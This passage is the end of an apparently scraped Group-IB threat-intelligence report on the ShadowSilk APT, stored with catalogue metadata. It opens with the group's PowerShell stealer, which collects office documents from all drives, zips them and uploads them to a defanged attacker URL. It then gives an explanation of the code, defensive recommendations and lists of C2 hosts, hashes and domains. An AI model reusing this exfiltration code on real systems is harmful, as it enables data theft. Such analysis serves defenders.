(Split-Path -Parent $relativePath).Substring($volume.Length)\r\n if (-Not (Test-Path -Path \"$path\\$dest\")) {\r\n $null = New-Item -path \"$path\\$dest\" -ItemType D\r\n }\r\n Copy-Item -Path $relativePath -Destination \"$path\\$dest\"\r\n }\r\n } catch {\r\n continue\r\n }\r\n }\r\n if(Test-Path -Path $zipname){\r\n Remove-Item -Recurse -Force -Confirm:$false -Path $zipname\r\n }\r\n [System.IO.Compression.ZipFile]::CreateFromDirectory($path, $zipname)\r\n Remove-Item -Recurse -Force -Confirm:$false -Path $path\r\n}\r\nfunction Day {\r\n param (\r\n [string]$tempPath,\r\n [datetime]$date\r\n )\r\n $filename = Join-Path -Path $tempPath -ChildPath \"ESET.txt\"\r\n if (-Not (Test-Path -Path $filename)) {\r\n Set-Content -Path $filename -Value $date.ToString('yyyy-MM-dd')\r\n return 7\r\n }\r\n try {\r\n $lastDate = [datetime]::ParseExact((Get-Content -Path $filename -Raw).Trim(), 'yyyy\r\n } catch {\r\n $lastDate = $date\r\n }\r\n $time = $date - $lastDate\r\n Set-Content -Path $filename -Value $date.ToString('yyyy-MM-dd')\r\n if ($time.Days -eq 0) {\r\n return 
7\r\n }\r\n return $time.Days\r\n}\r\nfunction Main {\r\n $hostname = $env:USERNAME\r\n $domain = $env:COMPUTERNAME\r\n $datetime_now = Get-Date\r\n $arch_list = @()\r\n $tempPath = 'C:\\Users\\Public\\Pictures'\r\n $volumes = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Used -ne 0 } | Select\r\n $days = Day -tempPath $tempPath -date $datetime_now\r\n foreach ($volume in $volumes) {\r\n try {\r\n $arch_name = Join-Path -Path $tempPath -ChildPath \"${domain}_${hostname}_${volu\r\n $arch_list += $arch_name\r\n MyBackup -arch $arch_name -volume $volume -date $datetime_now -days $days\r\n $zipname = \"$arch_name[.]zip\"\r\n \r\n Add-type -AssemblyName System.Net.Http\r\n Add-type -AssemblyName System.Web\r\n $httpClientHandler = New-Object System.Net.Http.HttpClientHandler\r\n $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler\r\n $FileStream = [System.IO.FileStream]::new($zipname, [System.IO.FileMode]::Open)\r\n $FileHeader = [System.Net.Http.Headers.ContentDispositionHeaderValue]::new('for\r\n $FileHeader[.]Name = \"zip_file\"\r\n $FileHeader.FileName = (Split-Path $zipname.Substring($tempPath.Length) -leaf)\r\n $FileContent = [System.Net.Http.StreamContent]::new($FileStream)\r\n $FileContent.Headers.ContentDisposition = $FileHeader\r\n $FileContent.Headers.ContentType = [System.Web.MimeMapping]::GetMimeMapping($zi\r\n \r\n $MultipartContent = [System.Net.Http.MultipartFormDataContent]::new()\r\n $MultipartContent.Add($FileContent)\r\n \r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 30 of 40\n\n$httpClient.PostAsync(\"hxxps://pweobmxdlboi[.]com/iufhtyhgyfugj.php\", $Multipar\r\n $FileStream.Dispose()\r\n Remove-Item -Path $zipname -Force -Confirm:$false\r\n } catch {\r\n continue\r\n }\r\n }\r\n}\r\nMain\r\nThis code:\r\nConclusion\r\nGroup-IB’s analysis of the threat actors’ past and ongoing campaigns revealed significant overlaps\r\nbetween ShadowSilk and the YoroTrooper collective. 
However, the discovery of a distinct toolset,\r\npreviously unidentified infrastructure, and new insights into the group’s profile led to the attribution\r\nof this activity to a separate threat cluster. Recent behavior indicates that the group remains highly\r\nactive, with new victims identified as recently as July. ShadowSilk continues to focus on the\r\ngovernment sector in Central Asia and the broader APAC region, underscoring the importance of\r\nmonitoring its infrastructure to prevent long-term compromise and data exfiltration.\r\nRecommendations\r\nSearches for files on all available drives except C:\\Users\\Public\\Pictures\\Test. Copies only files\r\nwith extensions .zip, .doc, .docx, .xls, .xlsx, .pdf, .txt. Excludes files with ~ at the beginning of the\r\nname and ESET.txt. Takes files modified in the last $days days. Saves a copy in\r\nC:\\Users\\Public\\Pictures\\Test.\r\nCreates a ZIP archive with a backup copy (Deletes the old archive, if it exists. Archives the folder\r\nwith backup files. Deletes temporary files after creating the archive.)\r\nUploads the archive to hxxps://pweobmxdlboi[.]com/iufhtyhgyfugj.php .Deletes the archive after\r\nsending.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 31 of 40\n\nFrequently Asked Questions\r\nShadowSilk is an advanced persistent threat (APT) group active since at least 2023. 
Initially linked to\r\nYoroTrooper, the group was later identified as a distinct threat cluster by Group-IB due to its\r\nexpanded toolset, infrastructure, and diverse victim profile.\r\nIt’s important to use email protection measures to prevent initial compromise through spear-phishing emails.\r\nObserve any use of commands and built-in tools that are frequently used for collecting\r\ninformation about the system and files.\r\nCombine strict application control, patching, and high-fidelity MXDR analytics keyed to known\r\nmalware artefacts.\r\nEnsure that your security measures allow for proactive threat hunting in order to identify threats\r\nthat cannot be detected automatically.\r\nKeeping your organization secure requires ongoing vigilance. Utilizing a proprietary solution like\r\nGroup-IB’s Threat Intelligence can enhance your security posture by providing teams with\r\nadvanced insights into emerging cyber threats allowing you to identify potential risks sooner\r\nand implement defenses more proactively.\r\nRegular monitoring of relevant sections of the dark web and data leaks will help keep your finger\r\non the pulse and adequately assess the current state of the organization’s security.\r\nWho is ShadowSilk?\r\narrow_drop_down\r\nWhat is the main motivation of ShadowSilk? arrow_drop_down\r\nIs ShadowSilk connected to YoroTrooper? arrow_drop_down\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 32 of 40\n\nIndicators of Compromise\r\nPanel JLIB \\ Panel JLIB – web-panel—shell\r\nhxxp://141[.]98[.]82[.]198:9942/ 2025-01-09T21:32:44.981482+00:00\r\nhxxp://88[.]214[.]26[.]37:9942/ 2024-07-24T11:21:59.731143+00:00\r\nWhat are ShadowSilk’s main targets? arrow_drop_down\r\nWhat tactics and techniques does ShadowSilk use? arrow_drop_down\r\nWhat are the tools and exploits used by ShadowSilk? arrow_drop_down\r\nWhat languages do the ShadowSilk operators use? arrow_drop_down\r\nHas ShadowSilk sold stolen data? 
arrow_drop_down\r\nWhat should organizations do if they suspect ShadowSilk\r\nactivity? arrow_drop_down\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 33 of 40\n\nPanel Morf Project – web-panel\r\nhxxp://193[.]124[.]203[.]226:9942/ 2024-09-25T17:59:18.896894+00:00\r\nhxxp://81[.]19[.]136[.]241:9942/ 2024-07-24T09:15:52.812127+00:00\r\nFile indicators\r\n471e1de3e1a7b0506f6492371a687cde4e278ed8\r\nca12e8975097d1591cda08d095d4af09b05da83f\r\nf385da641f2e506766a42dde81bb0fab13f845ee\r\nfbbf624503001a981095356d1bd26bbf206a0df2\r\nbcb1fd11b6b2f5046d4e5e8f714a8968d8a5d91d\r\nded2a5d2a7ebf3af1dc392c1af1e4b31fdc7cabc\r\n0135f8420c61babee43625dbba2a23ef9a12477d\r\n0279a25ee68fc23e91a353fbcd28f71c21e691fc\r\n16bd4dc2befb4f64aaecf74818a347cd1a02c30d\r\n04f2504f7f00f65e001709650affb90a86404e74\r\n5731274d1e7f0131e055ec34530f05ee603ef03b\r\n00bf14e8153778835f95b9255ae1658e37819f8d\r\nc02dd4d05a75e038c633d7d62669f2e1484f4b76\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 34 of 40\n\n55d214fa9aa4d17cdd222f7deb4c5ec7e71ed4be\r\nc805c64a9e22f7ae3dea79f9215c60cdf32d87b8\r\n4d1426c0e04056396f8526a42afbb42f869db85b\r\n4e98b193d5539bf1ded86a6ddea696288f0a1a3e\r\n9f4826cff6196b4a84fd9243fd6e6879c220b274\r\n85bb5a95db5b088b3e2f2c9f308b91d21d81e04d\r\n2cf77e48cf5699aac449c91552804e17edb04a71\r\n97bab01611d34ae97c368bd2c852f155b7286134\r\ndcb2d87b51de33f6d5fe53f777ad678c0af88a68\r\nd840b0b3039be6cce673e6e07da5bd5e76628434\r\n5e6254ebcf8ea518716c6090658b89960f425ab3\r\n84fcc10fef6409c9f50d56bf4f17070b51149841\r\n46bcac8ced15bf5bc1f2d9e463508273da6fa8e8\r\nfb3db25d5dfe21e3c457756b8bd865c560323527\r\n11b0b620d0f0c4269a191d4ad9fd2042fb5e9d6c\r\nb8ddc728483f1fe251d6ab64b401f297d993be39\r\n7006ff7361522f36a25fabd9b91cf755c42c8cd7\r\n488066ea37be17a8103d414c2593c7abb108ae95\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 35 of 40\n\nNetwork 
indicators\r\ndocument[.]hometowncity[.]cloud\r\npweobmxdlboi[.]com\r\nadm-govuz[.]com\r\ndocument[.]webmailsession[.]com\r\nmailboxdownload[.]com\r\ninbox[.]docworldme[.]com\r\ndocument[.]mailboxarea[.]cloud\r\nauth[.]allcloudindex[.]com\r\nmosreg[.]docworldme[.]com\r\nex[.]wincorpupdates[.]com\r\nmessage[.]mailboxarea[.]cloud\r\nadmin[.]inboxsession[.]info\r\nemails-cloud[.]com\r\nopenpdfllc[.]com\r\nss[.]qwadx[.]com\r\nsss[.]qwadx[.]com\r\n72[.]4[.]43[.]100\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 36 of 40\n\n81[.]19[.]136[.]241\r\n179[.]60[.]150[.]151\r\n5[.]188[.]86[.]233\r\n141[.]98[.]82[.]198\r\n64[.]7[.]198[.]46\r\n65[.]38[.]120[.]38\r\n168[.]100[.]8[.]21\r\n91[.]212[.]89[.]197\r\n88[.]214[.]26[.]37\r\n64[.]7[.]198[.]66\r\n72[.]5[.]43[.]100\r\n193[.]124[.]203[.]226\r\n85[.]209[.]128[.]171\r\n65[.]38[.]121[.]107\r\nMITRE ATT\u0026CK\r\nTactic Technique Procedure\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 37 of 40\n\nActive Scanning\r\n(T1595)\r\nUse of FOFA Shodan Fscan Gob ster Dirsearch\r\nGather Victim Network\r\nInformation (T1590)\r\nGather Victim Network\r\nInformation: IP\r\nAddresses\r\n(T1590.005)\r\nSearch Open\r\nShare this article\r\nFound it interesting? 
Don't hesitate to share it to wow your friends or colleagues\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 38 of 40\n\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 39 of 40\n\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 40 of 40",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.group-ib.com/blog/shadowsilk/"
	],
	"report_names": [
		"shadowsilk"
	],
	"threat_actors": [
		{
			"id": "c416152c-d268-40a3-8887-01d2ec452b7c",
			"created_at": "2023-04-27T02:04:45.481771Z",
			"updated_at": "2026-04-10T02:00:04.987067Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Silent Lynx"
			],
			"source_name": "ETDA:YoroTrooper",
			"tools": [
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Meterpreter",
				"Nymeria",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "322248d6-4baf-4ada-af8e-074bc6c10132",
			"created_at": "2023-11-05T02:00:08.072145Z",
			"updated_at": "2026-04-10T02:00:03.397406Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Comrade Saiga",
				"Salted Earth",
				"Sturgeon Fisher",
				"ShadowSilk",
				"Silent Lynx",
				"Cavalry Werewolf",
				"SturgeonPhisher"
			],
			"source_name": "MISPGALAXY:YoroTrooper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434764,
	"ts_updated_at": 1775791525,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.pdf",
		"text": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.txt",
		"img": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.jpg"
	}
}